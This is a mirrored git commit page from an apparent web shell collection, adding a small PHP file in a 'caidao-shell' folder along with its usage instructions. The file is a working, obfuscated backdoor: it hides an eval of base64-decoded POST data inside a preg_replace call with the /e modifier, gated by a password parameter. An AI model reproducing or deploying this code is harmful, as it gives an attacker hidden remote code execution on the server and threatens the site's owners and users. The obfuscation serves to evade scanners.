mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
Create w_2016-05-25.php
usage : shell.php?x=1 password "x" or shell.php password "x"
This commit is contained in:
6
caidao-shell/w_2016-05-25.php
Normal file
6
caidao-shell/w_2016-05-25.php
Normal file
@@ -0,0 +1,6 @@
|
|||||||
|
<?php
|
||||||
|
@$a = $_POST['x'];
|
||||||
|
if(isset($a)){
|
||||||
|
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
|
||||||
|
}
|
||||||
|
?>
|
||||||
Reference in New Issue
Block a user